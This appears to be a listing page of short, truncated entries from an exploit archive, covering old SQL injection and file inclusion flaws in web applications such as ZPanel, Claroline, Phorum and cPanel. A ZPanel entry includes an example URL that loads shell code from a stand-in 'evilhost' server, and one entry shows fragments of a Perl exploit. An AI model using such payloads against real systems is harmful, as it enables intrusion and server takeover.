Claroline e-Learning <= 1.6 Remote Hash SQL Injection Exploit (2)

Exploit for unknown platform in category web applications ================================================================= Claroline e-Learning \n"; print STDERR "Targets:\n1 - userInfo.php\n"; print STDERR "2 - exercisesdetails.php\n"; exit; if @ARGV 3 Usage; if @ARGV == 3 $host = @ARGV0; $path...

CVE-2005-1570

forum.asp in bttlxeForum 2.0 allows remote attackers to obtain full path information via a certain hex-encoded argument to the page parameter, possibly due to a SQL injection vulnerability...

ZPanel &lt;= 2.5 Remote SQL Injection Exploit

No description provided by source. Tested and working /str0ke It is possible to include arbitrary file: local - in version ZPanel = 2.5 beta 10, remote - in ZPanel 2.0. exploit for v 2.0 http://localhost/zpanel/zpanel.php?page=http://evilhost/shell where http://evilhost/shell.php - evil php code...

ZPanel <= 2.5 Remote SQL Injection Exploit

Exploit for unknown platform in category web applications ========================================== ZPanel = 2.5 Remote SQL Injection Exploit ========================================== Tested and working /str0ke It is possible to include arbitrary file: local - in version ZPanel = 2.5 beta 10,...

[Full-Disclosure] Kernelpanik Labs Digest 2005-2

Hi, This is a email digest with security fails recently published by Kernelpanik Labs http://www.kernelpanik.org. paNews 2.0.4b ------------- Remote SQL injection and command execution. Spanish: http://www.kernelpanik.org/docs/kernelpanik/panews.txt cuteNews 1.3.6 -------------- Remote XSS and...

PowerPortal 1.3 - SQL Injection

PowerPortal 1.3 - SQL Injection source: https://www.securityfocus.com/bid/11681/info PowerPortal is reported vulnerable to remote SQL injection. This issue is due to a failure of the application to properly validate user-supplied input prior to including it in an SQL query. PowerPortal 1.3 is...

PowerPortal 1.3 - SQL Injection

source: https://www.securityfocus.com/bid/11681/info PowerPortal is reported vulnerable to remote SQL injection. This issue is due to a failure of the application to properly validate user-supplied input prior to including it in an SQL query. PowerPortal 1.3 is reported prone to this vulnerabilit...

Phorum 5.0.x - &#039;FOLLOW.php&#039; SQL Injection

source: https://www.securityfocus.com/bid/11660/info Reportedly Phorum is affected by a remote SQL injection vulnerability. This issue is due to a failure of the application to properly sanitized user supplied URI input. This issue allows remote attackers to manipulate query logic, leading to...

Jaws 0.20.30.4 - ControlPanel.php SQL Injection

Jaws 0.20.30.4 - ControlPanel.php SQL Injection source: https://www.securityfocus.com/bid/10826/info JAWS is reportedly affected by a remote SQL injection vulnerability. This issue occurs in the controlpanel.php script due to a failure of the application to properly sanitize user-supplied URI...

Comersus Cart 5.0 - SQL Injection

Comersus Cart 5.0 - SQL Injection source: https://www.securityfocus.com/bid/10824/info Comersus Cart is reportedly affected by a remote SQL injection vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI parameter input before using it in an SQL...

cPanel 5-9 - Passwd SQL Injection

source: https://www.securityfocus.com/bid/10505/info cPanel is reportedly affected by a remote SQL injection vulnerability in the passwd script. This issue is due to a failure of the application to properly sanitize user-supplied URI parameter input before using it in an SQL query. The problem...

PHP-Nuke MS-Analysis Module - HTTP Referrer Field SQL Injection

source: https://www.securityfocus.com/bid/9948/info Reportedly the MS-Analysis module is prone to a remote SQL injection vulnerability. This issue is due to a failure to properly sanitize user supplied HTTP header input before using it in an SQL query. As a result of this, a malicious user may...

PHPGedView 2.5/2.6 - &#039;Placelist.php&#039; SQL Injection

source: https://www.securityfocus.com/bid/11910/info It is reported that PhpGedView is susceptible to a remote SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input prior to including it in an SQL query. This issue allows remote...